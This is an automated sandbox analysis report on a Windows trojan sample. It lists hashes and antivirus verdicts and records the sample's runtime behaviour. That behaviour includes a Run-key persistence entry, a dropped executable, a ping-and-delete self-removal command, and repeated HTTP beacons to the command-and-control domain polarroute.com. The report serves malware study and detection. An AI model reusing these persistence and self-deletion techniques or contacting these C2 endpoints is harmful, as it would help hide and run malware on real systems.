Analysis Date: 2015-10-14 01:56:12
MD5: eb9a0641a2802d01b8f40442980c542a
SHA1: d1770d569b5eebd411328f55d5ffd02bafb93880

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: fe8058e4006fca7424c964cccc1e0237 sha1: 6a90136fb23058090fc0ffd82a69e9bae3bed020 size: 56320
Section .rdata: md5: 9c9b446a02daa6409c23262139d48cb7 sha1: f300ed7e2b5e7456aaf2f227122fe4346407e8c0 size: 10240
Section .data: md5: 0e85cb31de1e91487f1efeeb96798d88 sha1: 0e272e318acf08ee509b8bddfec94e70e4fe7183 size: 6656
Section .rsrc: md5: 61fb2ab043e33ec214eefc8d3e2a5f91 sha1: 8bd2b04e0bda2ce7cd36a8ef3af990012593a364 size: 11776
Section .reloc: md5: 43262591e2c5d8372516fe6d9bdbb368 sha1: 175d00bd8ec4101a80b7e1d790d542f7be36c6c7 size: 5120
Timestamp: 2013-02-05 04:03:07
Packer: Microsoft Visual C++ ?.?
PEhash: 002471867be2a3235a3368c638e8b117ca084b94
IMPhash: 4511896d043677e4ab4578dc5bcab5a0
AV CA (E-Trust Ino): no_virus
AV Rising: Error Scanning File
AV Mcafee: Trojan-FDXL!EB9A0641A280
AV Avira (antivir): TR/Dropper.Gen7
AV Twister: Trojan.F5D4D60C125C8750
AV Ad-Aware: Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Shyape.G
AV Grisoft (avg): Generic32.CQJL
AV Symantec: Trojan.Sakurel
AV Fortinet: W32/Shyape.G!tr
AV BitDefender: Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AV K7: Trojan ( 0043a4491 )
AV Microsoft Security Essentials: Trojan:Win32/Diofopi.F
AV MicroWorld (escan): Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AV MalwareBytes: Trojan.Agent
AV Authentium: W32/A-1ec329e0!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.Win32.Scar
AV Emsisoft: Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AV Zillya!: Trojan.Scar.Win32.79088
AV Kaspersky: Trojan.Win32.Scar.hmoa
AV Trend Micro: BKDR_DIOFOPI.SM
AV CAT (quickheal): Trojan.Diofopi.MUE.E5
AV VirusBlokAda (vba32): Trojan.Scar
AV Padvish: no_virus
AV BullGuard: Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AV Arcabit (arcavir): Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoad3.22515
AV F-Secure: Gen:Trojan.Heur.RP.fuW@aCHU9Xcj

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicroMedia ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe
Creates Process: cmd.exe /c ping 127.0.0.1 & del /q C:\malware.exe

Process
↳ cmd.exe /c ping 127.0.0.1 & del /q C:\malware.exe

Creates Process: ping 127.0.0.1

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe

Winsock URL: http://www.polarroute.com/viewphoto.asp?resid=169578&photoid=abegujvatqzfzxq-1067872246
Winsock URL: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=107406
Winsock URL: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=138484
Winsock URL: http://www.polarroute.com/viewphoto.asp?resid=76343&photoid=abegujvatqzfzxq-1067872246
Winsock URL: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=76296
Winsock URL: http://www.polarroute.com/viewphoto.asp?resid=107421&photoid=abegujvatqzfzxq-1067872246
Winsock URL: http://www.polarroute.com/viewphoto.asp?resid=200656&photoid=abegujvatqzfzxq-1067872246
Winsock URL: http://www.polarroute.com/viewphoto.asp?resid=138500&photoid=abegujvatqzfzxq-1067872246
Winsock URL: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=200640
Winsock URL: http://www.polarroute.com/viewphoto.asp?resid=231734&photoid=abegujvatqzfzxq-1067872246
Winsock URL: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=231718
Winsock URL: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=169562

Process
↳ ping 127.0.0.1

Winsock DNS: 127.0.0.1

Network Details:

DNS: polarroute.com
Type: A
184.168.221.36
DNS: www.polarroute.com
Type: A
HTTP POST: http://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=75812
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=76296
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/viewphoto.asp?resid=76343&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POST: http://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=107375
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=107406
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/viewphoto.asp?resid=107421&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POST: http://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=138453
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=138484
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/viewphoto.asp?resid=138500&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POST: http://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=169531
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=169562
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/viewphoto.asp?resid=169578&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POST: http://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=200609
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=200640
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/viewphoto.asp?resid=200656&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POST: http://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=231687
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=231718
User-Agent: iexplorer
HTTP GET: http://www.polarroute.com/viewphoto.asp?resid=231734&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
Flows TCP: 192.168.1.1:1031 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1033 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1034 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1035 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1036 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1037 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1038 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1039 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1040 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1041 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1042 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1043 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1044 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1045 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1046 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1047 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1048 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1049 ➝ 184.168.221.36:80

Strings